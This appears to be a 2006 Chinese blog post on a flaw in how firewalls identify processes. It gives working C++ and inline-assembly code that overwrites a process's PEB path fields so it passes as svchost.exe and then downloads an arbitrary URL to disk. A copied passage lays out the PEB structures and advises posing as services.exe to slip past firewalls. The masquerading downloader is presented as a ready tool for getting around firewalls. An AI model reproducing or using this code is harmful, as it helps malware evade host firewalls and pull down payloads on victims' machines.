防火墙普遍存在的设计缺陷--关于进程路径的获取

 防火墙普遍存在的设计缺陷--关于进程路径的获取 收藏

<script type="text/javascript">function StorePage(){d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://www.365key.com/storeit.aspx?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t),'keyit','scrollbars=no,width=475,height=575,left=75,top=20,status=no,resizable=yes'));keyit.focus();}</script> 作者：RonCha 当程序访问网络时，一般情况下防火墙都会获取到程序的路径，并提示用户。 问 题就出在获取程序路径的方法，一般的防火墙程序都是直接在ring3下获取这些信息，也就是说防火墙程序获取的这些信息，基本上是程序的PEB中存放的信 息。如果我们修改了程序的PEB中相关的路径的信息的话，把程序修改伪装为系统进程的路径的话，防火墙就无法正确识别了。 DEMO代码如下，如需更完整的信息请与我联系：

// fuckdown.cpp : Defines the entry point for the console application.

//

//  [9/19/2006 RonCha]

#include "stdafx.h"

#include <urlmon.h>

#pragma comment(lib,"urlmon.lib")



char szpath[MAX_PATH]=...{0};

OLECHAR path[MAX_PATH]=...{0};





void ChangPath();



int main(int argc, char* argv[])

...{



    //修改路径

    ChangPath();

    if (argc==3)

    ...{

         if (argv[1]!="" && argv[2]!="")

         ...{

            HRESULT hRet=URLDownloadToFileA(NULL,argv[1],argv[2],NULL,NULL);

            if(hRet==S_OK)

                printf(" Down Success! ");

            else

                printf(" Can't down the file! ");

            return 1;

         }

    }

    printf("Author:RonCha ");

    printf("Web:http://blog.youkuaiyun.com/RonCha ");

    printf("Usage:fuckdown.exe downurl savepath ");

    return 0;

}



void ChangPath()

...{

    //将该进程伪装为svchost.exe

    int slen;

    slen=GetSystemDirectory(szpath,MAX_PATH);

    slen=GetSystemDirectory(szpath,slen);

    lstrcat(szpath,"/svchost.exe");

    //转化为Unicode字符

    MultiByteToWideChar(CP_ACP,NULL,szpath,-1,path,MAX_PATH);

    __asm

    ...{            

            MOV EAX, fs:[30h]            //get the PEB address

            MOV EAX, [EAX+0xC]             //_PEB_LDR_DATA

            MOV EAX, [EAX+0xC]             //InLoadOrderModuleList

            lea ebx,path

            mov WORD ptr[EAX+0x24],0x60  //FullDllName->Length

            mov [EAX+0x28],ebx             //FullDllName->Buffer

            MOV EAX, fs:[30h]

            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 

            lea EAX,[EAX+0x3c]             //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer

            lea ebx,path

            mov [eax],ebx                 //ImagePathName->Buffer

            mov WORD ptr[eax-4],0x60     //ImagePathName->Length

            MOV EAX, fs:[30h]

            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 

            lea eax,[EAX+0x44]             //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer

            lea ebx,path

            mov [eax],ebx                //CommandLine-->Buffer

            mov WORD ptr[eax-4],0x60    //CommandLine-->Length

    }

}

 另从邪恶八进制获得：

PEB(Process Environment Block)——进程环境块，存放进程信息，每个进程都有自己的 PEB 信息。在 Win 2000 下，进程环境块的地址对于每个进程来说是固定的，在 0x7FFDF000 处，这是用户区内存，所以程序能够直接访问。准确的 PEB 地址应从系统的 EPROCESS 结构的 1b0H 偏移处获得，但由于 EPROCESS 在进程的核心内存区，所以程序不能直接访问。还可以通过 TEB 结构的偏移 30H 处获得 PEB 的位置，代码如下：

mov eax,fs:[18]

mov eax,[eax+30]

PEB 及其相关结构如下：

typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);



typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING, *PUNICODE_STRING;


typedef struct _RTL_DRIVE_LETTER_CURDIR {

USHORT Flags;

USHORT Length;

ULONG TimeStamp;

UNICODE_STRING DosPath;

} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;



typedef struct _PEB_LDR_DATA {

ULONG Length;

BOOLEAN Initialized;

PVOID SsHandle;

LIST_ENTRY InLoadOrderModuleList;

LIST_ENTRY InMemoryOrderModuleList;

LIST_ENTRY InInitializationOrderModuleList;

} PEB_LDR_DATA, *PPEB_LDR_DATA;



typedef struct _LDR_MODULE {

LIST_ENTRY InLoadOrderModuleList;

LIST_ENTRY InMemoryOrderModuleList;

LIST_ENTRY InInitializationOrderModuleList;

PVOID BaseAddress;

PVOID EntryPoint;

ULONG SizeOfImage;

UNICODE_STRING FullDllName;

UNICODE_STRING BaseDllName;

ULONG Flags;

SHORT LoadCount;

SHORT TlsIndex;

LIST_ENTRY HashTableEntry;

ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;



typedef struct _RTL_USER_PROCESS_PARAMETERS {

ULONG MaximumLength;

ULONG Length;

ULONG Flags;

ULONG DebugFlags;

PVOID ConsoleHandle;

ULONG ConsoleFlags;

HANDLE StdInputHandle;

HANDLE StdOutputHandle;

HANDLE StdErrorHandle;

UNICODE_STRING CurrentDirectoryPath;

HANDLE CurrentDirectoryHandle;

UNICODE_STRING DllPath;

UNICODE_STRING ImagePathName;

UNICODE_STRING CommandLine;

PVOID Environment;

ULONG StartingPositionLeft;

ULONG StartingPositionTop;

ULONG Width;

ULONG Height;

ULONG CharWidth;

ULONG CharHeight;

ULONG ConsoleTextAttributes;

ULONG WindowFlags;

ULONG ShowWindowFlags;

UNICODE_STRING WindowTitle;

UNICODE_STRING DesktopName;

UNICODE_STRING ShellInfo;

UNICODE_STRING RuntimeData;

RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];

} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;



typedef struct _PEB_FREE_BLOCK {

struct _PEB_FREE_BLOCK *Next;

ULONG Size;

} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;



typedef struct _PEB {

BOOLEAN InheritedAddressSpace;

BOOLEAN ReadImageFileExecOptions;

BOOLEAN BeingDebugged;

BOOLEAN Spare;

HANDLE Mutant;

PVOID ImageBaseAddress;

PPEB_LDR_DATA LoaderData;

PRTL_USER_PROCESS_PARAMETERS ProcessParameters;

PVOID SubSystemData;

PVOID ProcessHeap;

PVOID FastPebLock;

PPEBLOCKROUTINE FastPebLockRoutine;

PPEBLOCKROUTINE FastPebUnlockRoutine;

ULONG EnvironmentUpdateCount;

PVOID *KernelCallbackTable;

PVOID EventLogSection;

PVOID EventLog;

PPEB_FREE_BLOCK FreeList;

ULONG TlsExpansionCounter;

PVOID TlsBitmap;

ULONG TlsBitmapBits[0x2];

PVOID ReadOnlySharedMemoryBase;

PVOID ReadOnlySharedMemoryHeap;

PVOID *ReadOnlyStaticServerData;

PVOID AnsiCodePageData;

PVOID OemCodePageData;

PVOID UnicodeCaseTableData;

ULONG NumberOfProcessors;

ULONG NtGlobalFlag;

BYTE Spare2[0x4];

LARGE_INTEGER CriticalSectionTimeout;

ULONG HeapSegmentReserve;

ULONG HeapSegmentCommit;

ULONG HeapDeCommitTotalFreeThreshold;

ULONG HeapDeCommitFreeBlockThreshold;

ULONG NumberOfHeaps;

ULONG MaximumNumberOfHeaps;

PVOID **ProcessHeaps;

PVOID GdiSharedHandleTable;

PVOID ProcessStarterHelper;

PVOID GdiDCAttributeList;

PVOID LoaderLock;

ULONG OSMajorVersion;

ULONG OSMinorVersion;

ULONG OSBuildNumber;

ULONG OSPlatformId;

ULONG ImageSubSystem;

ULONG ImageSubSystemMajorVersion;

ULONG ImageSubSystemMinorVersion;

ULONG GdiHandleBuffer[0x22];

ULONG PostProcessInitRoutine;

ULONG TlsExpansionBitmap;

BYTE TlsExpansionBitmapBits[0x80];

ULONG SessionId;

} PEB, *PPEB;

PEB 结构中的 PPEB_LDR_DATA 是一个指向 PEB_LDR_DATA 的指针，PEB_LDR_DATA 结构中有 3 个 LIST_ENTRY 的指针，分别是 InLoadOrderModuleList; InMemoryOrderModuleList; InInitializationOrderModuleList，如此循环。可以通过这三个 LIST_ENTRY 结构来遍历进程加载的模块。LDR_MODULE 结构中的 FullDllName 成员便是一个包含模块名信息的 UNICODE_STRIN 结构，它的成员 Buffer 即是指向存放模块名的 UNICODE 字符串指针。还有要注意的是，RTL_USER_PROCESS_PARAMETERS 结构中的 ImagePathName.Buffer 和 LoaderData->InLoadOrderModuleList.Flink->FullDllName.Buffer 指向的其实是同一内存。

 

在 Windows 2000 下，枚举系统进程的方法无外乎通过 Tool Help 函数，或是 PSAPI 函数。这两类函数虽然接口不同，但最后还是通过调用 NTDLL.DLL 中导出的 NtQuerySystemInformation 函数来实现的。这些函数最终是通过 LDR_MODULE 中指向的那些模块信息来实现进程和模块名字查询的。所以，只要修改 LDR_MODULE 指向的那些信息就能实现改变进程名或模块名。注意那些字符串都是 unicode 形式的，改的时候别忘了。

 

这样改过之后虽然能够骗过 EnumProcessModules 和 Module32First、Module32Next 函数，但若使用 Process32Next、Process32First 函数，PROCESSENTRY32 结构中的 szExeFile 还是会如实的返回 EXE 文件名，如此一来，在“windows 任务管理器”里就穿邦了，即便你改了 BaseDllName 也没用。别急，当然还是有办法改的。不知诸位有没有注意到，用 Delphi 编译出来的可执行文件，如果你没改工程名的话，无论你怎么改可执行文件的文件名，在“windows 任务管理器”中总是显示“project1.exe”，具体什么原理我也不清楚。哪位有兴趣可以反汇编一下，看看具体是如何实现的，我的汇编功底太差了。 不过这样就够了，你可以做个试验，用以上方法改变一个有上网请求的进程的 ImagePathName，然后看看防火墙有什么反映。果然，被骗过去了。用这个方法就可以“穿透”防火墙了。 那具体应该改为哪个程序名呢？在 windows 2000 下，C:/WINNT/system32/services.exe 负责DNS解析等任务，总是被允许上网的，所以改成“C:/WINNT/system32/services.exe”就可以了。